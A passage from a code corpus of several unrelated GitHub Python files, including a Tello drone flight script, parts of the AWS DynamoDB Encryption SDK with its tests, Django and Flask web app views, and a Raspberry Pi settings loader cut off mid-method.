if function == 1: # all vs all (so 115 x 115)
plot_assignment_sims(versus_all=True, save_to_file=True)
elif function == 2: # all vs max (so 115 x 1)
plot_assignment_sims(versus_all=False, save_to_file=True)
elif function == 3:
calc_silhouette()
``` |
{
"source": "johnwalicki/tello-python-examples",
"score": 3
} |
#### File: johnwalicki/tello-python-examples/example2.py
```python
from time import sleep
import tellopy
def handler(event, sender, data, **args):
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
print(data)
def test():
drone = tellopy.Tello()
try:
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.connect()
drone.wait_for_connection(60.0)
drone.takeoff()
sleep(5)
drone.up(30)
sleep(1)
drone.up(0)
sleep(3)
drone.flip_forwardright()
sleep(3)
drone.forward(40)
sleep(1)
drone.forward(0)
drone.clockwise(50)
sleep(5)
drone.clockwise(0)
sleep(1)
drone.right(40)
sleep(2)
drone.right(0)
sleep(1)
drone.left(40)
sleep(2)
drone.left(0)
sleep(1)
drone.forward(30)
drone.down(20)
sleep(2)
drone.forward(0)
sleep(1)
drone.counter_clockwise(50)
sleep(5)
drone.counter_clockwise(0)
drone.land()
sleep(5)
except Exception as ex:
print(ex)
finally:
drone.quit()
if __name__ == '__main__':
test()
``` |
{
"source": "johnwalker/aws-dynamodb-encryption-python",
"score": 2
} |
#### File: dynamodb_encryption_sdk/encrypted/resource.py
```python
from functools import partial
import attr
from boto3.resources.base import ServiceResource
from boto3.resources.collection import CollectionManager
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Optional # noqa pylint: disable=unused-import
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
from dynamodb_encryption_sdk.internal.utils import (
crypto_config_from_cache, decrypt_batch_get_item, encrypt_batch_write_item, TableInfoCache
)
from dynamodb_encryption_sdk.material_providers import CryptographicMaterialsProvider
from dynamodb_encryption_sdk.structures import AttributeActions
from .item import decrypt_python_item, encrypt_python_item
from .table import EncryptedTable
__all__ = ('EncryptedResource', 'EncryptedTablesCollectionManager')
@attr.s(init=False)
class EncryptedTablesCollectionManager(object):
# pylint: disable=too-few-public-methods
"""Tables collection manager that provides :class:`EncryptedTable` objects.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.ServiceResource.tables
:param collection: Pre-configured boto3 DynamoDB table collection manager
:type collection: boto3.resources.collection.CollectionManager
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials provider to use
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign attributes
:param TableInfoCache table_info_cache: Local cache from which to obtain TableInfo data
"""
_collection = attr.ib(validator=attr.validators.instance_of(CollectionManager))
_materials_provider = attr.ib(validator=attr.validators.instance_of(CryptographicMaterialsProvider))
_attribute_actions = attr.ib(validator=attr.validators.instance_of(AttributeActions))
_table_info_cache = attr.ib(validator=attr.validators.instance_of(TableInfoCache))
def __init__(
self,
collection, # type: CollectionManager
materials_provider, # type: CryptographicMaterialsProvider
attribute_actions, # type: AttributeActions
table_info_cache # type: TableInfoCache
): # noqa=D107
# type: (...) -> None
# Workaround pending resolution of attrs/mypy interaction.
# https://github.com/python/mypy/issues/2088
# https://github.com/python-attrs/attrs/issues/215
self._collection = collection
self._materials_provider = materials_provider
self._attribute_actions = attribute_actions
self._table_info_cache = table_info_cache
attr.validate(self)
self.__attrs_post_init__()
def __attrs_post_init__(self):
"""Set up the translation methods."""
self.all = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.all
)
self.filter = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.filter
)
self.limit = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.limit
)
self.page_size = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.page_size
)
def __getattr__(self, name):
"""Catch any method/attribute lookups that are not defined in this class and try
to find them on the provided collection object.
:param str name: Attribute name
:returns: Result of asking the provided collection object for that attribute name
:raises AttributeError: if attribute is not found on provided collection object
"""
return getattr(self._collection, name)
def _transform_table(self, method, **kwargs):
"""Transform a Table from the underlying collection manager to an EncryptedTable.
:param method: Method on underlying collection manager to call
:type method: callable
:param **kwargs: Keyword arguments to pass to ``method``
"""
for table in method(**kwargs):
yield EncryptedTable(
table=table,
materials_provider=self._materials_provider,
table_info=self._table_info_cache.table_info(table.name),
attribute_actions=self._attribute_actions
)
@attr.s(init=False)
class EncryptedResource(object):
# pylint: disable=too-few-public-methods
"""High-level helper class to provide a familiar interface to encrypted tables.
>>> import boto3
>>> from dynamodb_encryption_sdk.encrypted.resource import EncryptedResource
>>> from dynamodb_encryption_sdk.material_providers.aws_kms import AwsKmsCryptographicMaterialsProvider
>>> resource = boto3.resource('dynamodb')
>>> aws_kms_cmp = AwsKmsCryptographicMaterialsProvider('alias/MyKmsAlias')
>>> encrypted_resource = EncryptedResource(
... resource=resource,
... materials_provider=aws_kms_cmp
... )
.. note::
This class provides a superset of the boto3 DynamoDB service resource API, so should
work as a drop-in replacement once configured.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#service-resource
If you want to provide per-request cryptographic details, the ``batch_write_item``
and ``batch_get_item`` methods will also accept a ``crypto_config`` parameter, defining
a custom :class:`CryptoConfig` instance for this request.
:param resource: Pre-configured boto3 DynamoDB service resource object
:type resource: boto3.resources.base.ServiceResource
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials provider to use
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign attributes
:param bool auto_refresh_table_indexes: Should we attempt to refresh information about table indexes?
Requires ``dynamodb:DescribeTable`` permissions on each table. (default: True)
"""
_resource = attr.ib(validator=attr.validators.instance_of(ServiceResource))
_materials_provider = attr.ib(validator=attr.validators.instance_of(CryptographicMaterialsProvider))
_attribute_actions = attr.ib(
validator=attr.validators.instance_of(AttributeActions),
default=attr.Factory(AttributeActions)
)
_auto_refresh_table_indexes = attr.ib(
validator=attr.validators.instance_of(bool),
default=True
)
def __init__(
self,
resource, # type: ServiceResource
materials_provider, # type: CryptographicMaterialsProvider
attribute_actions=None, # type: Optional[AttributeActions]
auto_refresh_table_indexes=True # type: Optional[bool]
): # noqa=D107
# type: (...) -> None
# Workaround pending resolution of attrs/mypy interaction.
# https://github.com/python/mypy/issues/2088
# https://github.com/python-attrs/attrs/issues/215
if attribute_actions is None:
attribute_actions = AttributeActions()
self._resource = resource
self._materials_provider = materials_provider
self._attribute_actions = attribute_actions
self._auto_refresh_table_indexes = auto_refresh_table_indexes
attr.validate(self)
self.__attrs_post_init__()
def __attrs_post_init__(self):
"""Set up the table info cache, encrypted tables collection manager, and translation methods."""
self._table_info_cache = TableInfoCache( # attrs confuses pylint: disable=attribute-defined-outside-init
client=self._resource.meta.client,
auto_refresh_table_indexes=self._auto_refresh_table_indexes
)
self._crypto_config = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
crypto_config_from_cache,
self._materials_provider,
self._attribute_actions,
self._table_info_cache
)
self.tables = EncryptedTablesCollectionManager( # attrs confuses pylint: disable=attribute-defined-outside-init
collection=self._resource.tables,
materials_provider=self._materials_provider,
attribute_actions=self._attribute_actions,
table_info_cache=self._table_info_cache
)
self.batch_get_item = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
decrypt_batch_get_item,
decrypt_python_item,
self._crypto_config,
self._resource.batch_get_item
)
self.batch_write_item = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
encrypt_batch_write_item,
encrypt_python_item,
self._crypto_config,
self._resource.batch_write_item
)
def __getattr__(self, name):
"""Catch any method/attribute lookups that are not defined in this class and try
to find them on the provided resource object.
:param str name: Attribute name
:returns: Result of asking the provided resource object for that attribute name
:raises AttributeError: if attribute is not found on provided resource object
"""
return getattr(self._resource, name)
def Table(self, name, **kwargs):
# naming chosen to align with boto3 resource name, so pylint: disable=invalid-name
"""Creates an EncryptedTable resource.
If any of the optional configuration values are not provided, the corresponding values
for this ``EncryptedResource`` will be used.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.ServiceResource.Table
:param name: The table name.
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials
provider to use (optional)
:param TableInfo table_info: Information about the target DynamoDB table (optional)
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign
attributes (optional)
"""
table_kwargs = dict(
table=self._resource.Table(name),
materials_provider=kwargs.get('materials_provider', self._materials_provider),
attribute_actions=kwargs.get('attribute_actions', self._attribute_actions),
auto_refresh_table_indexes=kwargs.get('auto_refresh_table_indexes', self._auto_refresh_table_indexes),
table_info=self._table_info_cache.table_info(name)
)
return EncryptedTable(**table_kwargs)
```
#### File: formatting/deserialize/attribute.py
```python
import codecs
from decimal import Decimal
import io
import logging
import struct
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Callable, Dict, List, Text, Union # noqa pylint: disable=unused-import
from dynamodb_encryption_sdk.internal import dynamodb_types # noqa pylint: disable=unused-import,ungrouped-imports
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
from boto3.dynamodb.types import Binary
from dynamodb_encryption_sdk.exceptions import DeserializationError
from dynamodb_encryption_sdk.identifiers import LOGGER_NAME
from dynamodb_encryption_sdk.internal.formatting.deserialize import decode_byte, decode_length, decode_tag, decode_value
from dynamodb_encryption_sdk.internal.identifiers import Tag, TagValues, TEXT_ENCODING
from dynamodb_encryption_sdk.internal.str_ops import to_str
__all__ = ('deserialize_attribute',)
_LOGGER = logging.getLogger(LOGGER_NAME)
def deserialize_attribute(serialized_attribute): # noqa: C901 pylint: disable=too-many-locals
# type: (bytes) -> dynamodb_types.RAW_ATTRIBUTE
"""Deserializes serialized attributes for decryption.
:param bytes serialized_attribute: Serialized attribute bytes
:returns: Deserialized attribute
:rtype: dict
"""
def _transform_binary_value(value):
# (bytes) -> bytes
"""Transforms a serialized binary value.
:param bytes value: Raw deserialized value
:rtype: bytes
"""
if isinstance(value, Binary):
return value.value
return value
def _deserialize_binary(stream):
# type: (io.BytesIO) -> Dict[Text, bytes]
"""Deserializes a binary object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.BINARY.dynamodb_tag: _transform_binary_value(value)}
def _transform_string_value(value):
# (bytes) -> dynamodb_types.STRING
"""Transforms a serialized string value.
:param bytes value: Raw deserialized value
:rtype: dynamodb_encryption_sdk.internal.dynamodb_types.STRING
"""
return codecs.decode(value, TEXT_ENCODING)
def _deserialize_string(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.STRING]
"""Deserializes a string object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.STRING.dynamodb_tag: _transform_string_value(value)}
def _transform_number_value(value):
# (bytes) -> dynamodb_types.STRING
"""Transforms a serialized number value.
:param bytes value: Raw deserialized value
:rtype: dynamodb_encryption_sdk.internal.dynamodb_types.STRING
"""
raw_value = codecs.decode(value, TEXT_ENCODING)
decimal_value = Decimal(to_str(raw_value)).normalize()
return '{0:f}'.format(decimal_value)
def _deserialize_number(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.STRING]
"""Deserializes a number object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.NUMBER.dynamodb_tag: _transform_number_value(value)}
_boolean_map = {
TagValues.FALSE.value: False,
TagValues.TRUE.value: True
}
def _deserialize_boolean(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.BOOLEAN]
"""Deserializes a boolean object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_byte(stream)
return {Tag.BOOLEAN.dynamodb_tag: _boolean_map[value]}
def _deserialize_null(stream): # we want a consistent API but don't use stream, so pylint: disable=unused-argument
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.BOOLEAN]
"""Deserializes a null object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.NULL.dynamodb_tag: True}
def _deserialize_set(stream, member_transform):
# type: (io.BytesIO, Callable) -> List[Union[dynamodb_types.BINARY, dynamodb_types.STRING]]
"""Deserializes contents of serialized set.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: list
"""
member_count = decode_length(stream)
return sorted([
member_transform(decode_value(stream))
for _ in range(member_count)
])
def _deserialize_binary_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.BINARY]]
"""Deserializes a binary set object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.BINARY_SET.dynamodb_tag: _deserialize_set(stream, _transform_binary_value)}
def _deserialize_string_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.STRING]]
"""Deserializes a string set object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.STRING_SET.dynamodb_tag: _deserialize_set(stream, _transform_string_value)}
def _deserialize_number_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.STRING]]
"""Deserializes a number set object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.NUMBER_SET.dynamodb_tag: _deserialize_set(stream, _transform_number_value)}
def _deserialize_list(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.LIST]
"""Deserializes a list object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
member_count = decode_length(stream)
return {Tag.LIST.dynamodb_tag: [
_deserialize(stream)
for _ in range(member_count)
]}
def _deserialize_map(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.MAP]
"""Deserializes a map object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
member_count = decode_length(stream)
members = {} # type: dynamodb_types.MAP
for _ in range(member_count):
key = _deserialize(stream)
if Tag.STRING.dynamodb_tag not in key:
raise DeserializationError(
'Malformed serialized map: found "{}" as map key.'.format(list(key.keys())[0])
)
value = _deserialize(stream)
members[key[Tag.STRING.dynamodb_tag]] = value
return {Tag.MAP.dynamodb_tag: members}
def _deserialize_function(tag):
# type: (bytes) -> Callable
"""Identifies the correct deserialization function based on the provided tag.
:param tag: Identifying tag, read from start of serialized object
:type tag: dynamodb_encryption_sdk.internal.identifiers.Tag
:rtype: callable
"""
deserialize_functions = {
Tag.BINARY.tag: _deserialize_binary,
Tag.BINARY_SET.tag: _deserialize_binary_set,
Tag.NUMBER.tag: _deserialize_number,
Tag.NUMBER_SET.tag: _deserialize_number_set,
Tag.STRING.tag: _deserialize_string,
Tag.STRING_SET.tag: _deserialize_string_set,
Tag.BOOLEAN.tag: _deserialize_boolean,
Tag.NULL.tag: _deserialize_null,
Tag.LIST.tag: _deserialize_list,
Tag.MAP.tag: _deserialize_map
}
try:
return deserialize_functions[tag]
except KeyError:
raise DeserializationError('Unsupported tag: "{}"'.format(tag))
def _deserialize(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.RAW_ATTRIBUTE]
"""Deserializes a serialized object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
try:
tag = decode_tag(stream)
return _deserialize_function(tag)(stream)
except struct.error:
raise DeserializationError('Malformed serialized data')
if not serialized_attribute:
raise DeserializationError('Empty serialized attribute data')
stream = io.BytesIO(serialized_attribute)
return _deserialize(stream)
```
#### File: test/functional/hypothesis_strategies.py
```python
from decimal import Decimal
from boto3.dynamodb.types import Binary
import hypothesis
from hypothesis.strategies import (
binary, booleans, deferred, dictionaries, fractions, just, lists, none, sets, text
)
SLOW_SETTINGS = hypothesis.settings(
suppress_health_check=(
hypothesis.HealthCheck.too_slow,
hypothesis.HealthCheck.data_too_large,
hypothesis.HealthCheck.hung_test,
hypothesis.HealthCheck.large_base_example
),
timeout=hypothesis.unlimited,
deadline=None
)
VERY_SLOW_SETTINGS = hypothesis.settings(
SLOW_SETTINGS,
max_examples=1000,
max_iterations=1500
)
MAX_ITEM_BYTES = 400 * 1024 * 1024
# _MIN_NUMBER = Decimal('1E-128') # The DDB min is 1E-130, but DYNAMODB_CONTEXT Emin is -128
# _MAX_NUMBER = Decimal('9.9999999999999999999999999999999999999E+125')
# TODO: I would like to test the full range of possible number values, but boto3 does not
# correctly handle conversion of large edge case values at this time. We will work to fix
# that, but in the meantime, we will just use the happy path numbers.
_MIN_NUMBER = Decimal('1E-38')
_MAX_NUMBER = Decimal('9.{}E37'.format('9' * 37))
ddb_string = text(
min_size=1,
max_size=MAX_ITEM_BYTES
)
ddb_string_set = sets(ddb_string, min_size=1)
def _ddb_fraction_to_decimal(val):
"""Hypothesis does not support providing a custom Context, so working around that."""
return Decimal(val.numerator) / Decimal(val.denominator)
def _negative(val):
return val * Decimal('-1')
ddb_positive_numbers = fractions(
min_value=_MIN_NUMBER,
max_value=_MAX_NUMBER
).map(_ddb_fraction_to_decimal)
ddb_negative_numbers = ddb_positive_numbers.map(_negative)
ddb_number = ddb_negative_numbers | just(Decimal('0')) | ddb_positive_numbers
ddb_number_set = sets(ddb_number, min_size=1)
ddb_binary = binary(min_size=1, max_size=MAX_ITEM_BYTES).map(Binary)
ddb_binary_set = sets(ddb_binary, min_size=1)
ddb_boolean = booleans()
ddb_null = none()
ddb_scalar_types = (
ddb_string |
ddb_number |
ddb_binary |
ddb_boolean |
ddb_null
)
ddb_set_types = (
ddb_string_set |
ddb_number_set |
ddb_binary_set
)
ddb_attribute_names = text(
min_size=1,
max_size=255
)
# TODO: List and Map types have a max depth of 32
ddb_map_type = deferred(lambda: dictionaries(
keys=ddb_attribute_names,
values=(
ddb_scalar_types |
ddb_set_types |
ddb_list_type |
ddb_map_type
),
min_size=1
))
ddb_list_type = deferred(lambda: lists(
ddb_scalar_types |
ddb_set_types |
ddb_list_type |
ddb_map_type,
min_size=1
))
ddb_document_types = ddb_map_type | ddb_list_type
ddb_attribute_values = ddb_scalar_types | ddb_set_types | ddb_list_type
ddb_items = dictionaries(
keys=ddb_attribute_names,
values=ddb_attribute_values,
min_size=1
)
material_descriptions = deferred(lambda: dictionaries(
keys=text(),
values=text(),
min_size=1
))
```
#### File: internal/crypto/test_authentication.py
```python
import pytest
from dynamodb_encryption_sdk.internal.crypto.authentication import _string_to_sign
from ...functional_test_vector_generators import string_to_sign_test_vectors
pytestmark = [pytest.mark.functional, pytest.mark.local]
@pytest.mark.parametrize('item, table_name, attribute_actions, expected_result', string_to_sign_test_vectors())
def test_string_to_sign(item, table_name, attribute_actions, expected_result):
generated_string = _string_to_sign(item, table_name, attribute_actions)
assert generated_string == expected_result
```
#### File: test/functional/test_structures.py
```python
import boto3
import pytest
from dynamodb_encryption_sdk.exceptions import InvalidArgumentError
from dynamodb_encryption_sdk.identifiers import CryptoAction
from dynamodb_encryption_sdk.structures import AttributeActions, TableIndex, TableInfo
from .functional_test_utils import (
example_table, table_with_global_seconary_indexes, table_with_local_seconary_indexes, TEST_TABLE_NAME
)
pytestmark = [pytest.mark.functional, pytest.mark.local]
# TODO: There is a way to parameterize fixtures, but the existing docs on that are very unclear.
# This will get us what we need for now, but we should come back to this to clean this up later.
def test_tableinfo_refresh_indexes_no_secondary_indexes(example_table):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
def test_tableinfo_refresh_indexes_with_gsis(table_with_global_seconary_indexes):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
def test_tableinfo_refresh_indexes_with_lsis(table_with_local_seconary_indexes):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
@pytest.mark.parametrize('kwargs, expected_attributes', (
(dict(partition='partition_name'), set(['partition_name'])),
(dict(partition='partition_name', sort='sort_name'), set(['partition_name', 'sort_name']))
))
def test_tableindex_attributes(kwargs, expected_attributes):
index = TableIndex(**kwargs)
assert index.attributes == expected_attributes
@pytest.mark.parametrize('key_schema, expected_kwargs', (
(
[
{
'KeyType': 'HASH',
'AttributeName': 'partition_name'
}
],
dict(partition='partition_name')
),
(
[
{
'KeyType': 'HASH',
'AttributeName': 'partition_name'
},
{
'KeyType': 'RANGE',
'AttributeName': 'sort_name'
}
],
dict(partition='partition_name', sort='sort_name')
)
))
def test_tableindex_from_key_schema(key_schema, expected_kwargs):
index = TableIndex.from_key_schema(key_schema)
expected_index = TableIndex(**expected_kwargs)
assert index == expected_index
@pytest.mark.parametrize('default, overrides, expected_result', (
(CryptoAction.ENCRYPT_AND_SIGN, {}, CryptoAction.SIGN_ONLY),
(CryptoAction.SIGN_ONLY, {}, CryptoAction.SIGN_ONLY),
(CryptoAction.DO_NOTHING, {}, CryptoAction.DO_NOTHING),
(CryptoAction.ENCRYPT_AND_SIGN, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.ENCRYPT_AND_SIGN, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING),
(CryptoAction.SIGN_ONLY, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.SIGN_ONLY, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING),
(CryptoAction.DO_NOTHING, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.DO_NOTHING, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING)
))
def test_attribute_actions_index_override(default, overrides, expected_result):
test = AttributeActions(default_action=default, attribute_actions=overrides)
test.set_index_keys('indexed_attribute')
assert test.action('indexed_attribute') is expected_result
@pytest.mark.parametrize('default', CryptoAction)
def test_attribute_actions_index_override_fail(default):
test = AttributeActions(
default_action=default,
attribute_actions={'indexed_attribute': CryptoAction.ENCRYPT_AND_SIGN}
)
with pytest.raises(InvalidArgumentError) as excinfo:
test.set_index_keys('indexed_attribute')
excinfo.match(r'Cannot overwrite a previously requested action on indexed attribute: *')
``` |
{
"source": "johnwanjema/gallery",
"score": 2
} |
#### File: gallery/photos/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image
# Create your views here.
def index(request):
images = Image.get_allImages()
return render(request, 'index.html',{"images":images})
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
print(search_term)
searched_images = Image.search_image_by_category(search_term)
print(searched_images)
message = f"{search_term}"
return render(request, 'search.html',{"message":message,"images": searched_images})
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
def nairobi(request):
images = Image.search_image_by_location('nairobi')
return render(request,'nairobi.html',{"images":images})
def tokyo(request):
images = Image.search_image_by_location('tokyo')
return render(request,'tokyo.html',{"images":images})
def rio(request):
images = Image.search_image_by_location('rio')
return render(request,'rio.html',{"images":images})
def berlin(request):
images = Image.search_image_by_location('berlin')
return render(request,'berlin.html',{"images":images})
``` |
{
"source": "johnwanjema/news-highlight",
"score": 3
} |
#### File: news-highlight/test/news_article_test.py
```python
import unittest
from app.models import Articles
class SourcesTest(unittest.TestCase):
'''
Test Class to test the behaviour of the Articles class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_source = Articles(111,"abc","trump visita japan", "abc.com","https://www.abc.net.au/news/image/11232934-16x9-700x394.jpg","japan to welcome trump","2019-06-23T08:31:32Z")
def test_instance(self):
self.assertTrue(isinstance(self.new_source, Articles))
``` |
{
"source": "johnwanjema/pitches",
"score": 2
} |
#### File: app/main/views.py
```python
from flask import render_template, request, redirect, url_for,abort
from . import main
from .. import db,photos
from .forms import PitchForm,CommentForm,UpdateProfile
from flask import render_template, flash,request
from flask import render_template,redirect,url_for
from ..models import User,Pitch,Comments
from .. import db
from flask_login import login_user,logout_user,login_required,current_user
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
title = "pitches"
return render_template('index.html',title = title )
@main.route('/pitches')
@login_required
def pitches():
pitches = Pitch.query.all()
interview_pitch = Pitch.get_pitches_by_category('1')
pickup_lines = Pitch.get_pitches_by_category('2')
product_pitch = Pitch.get_pitches_by_category('3')
promotion_pitch = Pitch.get_pitches_by_category('4')
if not pitches:
return redirect(url_for('main.pitch'))
title = "pitches"
return render_template("pitch.html", pitches = pitches, interviews = interview_pitch, pickups = pickup_lines,products = product_pitch,promotions = promotion_pitch )
@main.route('/pitch', methods = ['GET','POST'])
@login_required
def pitch():
form = PitchForm()
if form.validate_on_submit():
pitch = Pitch(pitch = form.pitch.data, user_id = current_user.id,pitch_title = form.pitch_title.data,pitch_category = form.pitch_category.data ,pitch_upvotes = 0, pitch_downvotes = 0)
db.session.add(pitch)
db.session.commit()
return redirect(url_for('main.index'))
title = "pitches"
return render_template('new_pitch.html',pitch_form = form)
@main.route('/comment/<int:id>', methods=['GET', 'POST'])
@login_required
def post_comment(id):
form = CommentForm()
title = 'post comment'
pitch = Pitch.get_pitch(id)
if pitch is None:
    abort(404)
if request.args.get("upvote"):
    pitch.pitch_upvotes += 1
    db.session.add(pitch)
    db.session.commit()
    return redirect("/comment/{pitch_id}".format(pitch_id=pitch.id))
elif request.args.get("downvote"):
    pitch.pitch_downvotes += 1
    db.session.add(pitch)
    db.session.commit()
    return redirect("/comment/{pitch_id}".format(pitch_id=pitch.id))
# Only show comments that belong to this pitch
comments = Comments.query.filter_by(pitch_id=pitch.id).all()
if form.validate_on_submit():
comment = form.comment.data
new_comment = Comments(comment=comment, user_id=current_user.id, pitch_id=pitch.id)
db.session.add(new_comment)
db.session.commit()
return redirect(url_for('main.pitches'))
return render_template('post_comment.html', comment_form=form, title=title,comments=comments , pitch = pitch)
@main.route('/user/<uname>/<int:id>')
def profile(uname,id):
user = User.query.filter_by(username = uname).first()
pitches = Pitch.query.filter_by(user_id=id)
if user is None:
abort(404)
return render_template("profile/profile.html", user = user , pitches = pitches)
@main.route('/user/<uname>/update',methods = ['GET','POST'])
@login_required
def update_profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
form = UpdateProfile()
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username,))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname,id= current_user.id))
``` |
{
"source": "johnwargo/pi-remind-hd-notify",
"score": 2
} |
#### File: johnwargo/pi-remind-hd-notify/settings.py
```python
import datetime
import logging
import json
# string displayed by assert statement
CONFIG_ERROR = 'Configuration data not available'
# the config object properties, used when validating the config
CONFIG_PROPERTIES = ["access_token", "busy_only", "debug_mode", "display_meeting_summary", "device_id",
"ignore_in_summary", "reboot_counter_limit", "reminder_only", "use_reboot_counter",
"use_remote_notify", "use_working_hours", "work_start", "work_end"]
# a place to hold the object from the config file
_config = None
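
# For reference, a config.json consistent with CONFIG_PROPERTIES might look like
# the following (all values are illustrative assumptions, not a real configuration):
# {
#     "access_token": "<ACCESS_TOKEN>",
#     "busy_only": false,
#     "debug_mode": false,
#     "display_meeting_summary": true,
#     "device_id": "<DEVICE_ID>",
#     "ignore_in_summary": [],
#     "reboot_counter_limit": 10,
#     "reminder_only": false,
#     "use_reboot_counter": false,
#     "use_remote_notify": false,
#     "use_working_hours": true,
#     "work_start": "8:00",
#     "work_end": "17:30"
# }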
class Settings:
# singleton instance of this class
__instance = None
# Class variables
_busy_only = None
_debug_mode = None
_display_meeting_summary = None
_ignore_in_summary = None
_reminder_only = None
_use_remote_notify = None
_access_token = None
_device_id = None
_use_reboot_counter = None
_reboot_counter_limit = None
_use_working_hours = None
_work_end = None
_work_start = None
def __init__(self):
global _config
if Settings.__instance is None:
# then we've not initialized yet
logging.info('Settings: Initializing class')
# we're creating an instance of the class, so set that here
Settings.__instance = self
logging.info('Settings: Opening project configuration file (config.json)')
# Read the config file contents
# https://martin-thoma.com/configuration-files-in-python/
with open("config.json") as json_data_file:
_config = json.load(json_data_file)
# did the config read correctly?
if _config is not None:
logging.info('Config file read')
Settings._busy_only = self.get_config_value(_config, 'busy_only', False)
Settings._debug_mode = self.get_config_value(_config, 'debug_mode', False)
Settings._display_meeting_summary = self.get_config_value(_config, 'display_meeting_summary', True)
Settings._ignore_in_summary = self.get_config_value(_config, 'ignore_in_summary', [])
Settings._reminder_only = self.get_config_value(_config, 'reminder_only', False)
Settings._use_reboot_counter = self.get_config_value(_config, 'use_reboot_counter', False)
logging.info('Busy only: {}'.format(Settings._busy_only))
logging.info('Debug Mode: {}'.format(Settings._debug_mode))
logging.info('Display Meeting Summary: {}'.format(Settings._display_meeting_summary))
logging.info('Ignore in Meeting Summary: {}'.format(Settings._ignore_in_summary))
logging.info('Reminder Only: {}'.format(Settings._reminder_only))
logging.info('Use Reboot Counter: {}'.format(Settings._use_reboot_counter))
if Settings._use_reboot_counter:
Settings._reboot_counter_limit = self.get_config_value(_config, 'reboot_counter_limit', 10)
logging.info('Reboot Counter Limit: {}'.format(Settings._reboot_counter_limit))
Settings._use_remote_notify = self.get_config_value(_config, 'use_remote_notify', False)
logging.info('Use Remote Notify: {}'.format(Settings._use_remote_notify))
# if remote notify is enabled, that's the only time we need...
if Settings._use_remote_notify:
Settings._access_token = self.get_config_value(_config, 'access_token', "")
Settings._device_id = self.get_config_value(_config, 'device_id', "")
logging.info('Access Token: {}'.format(Settings._access_token))
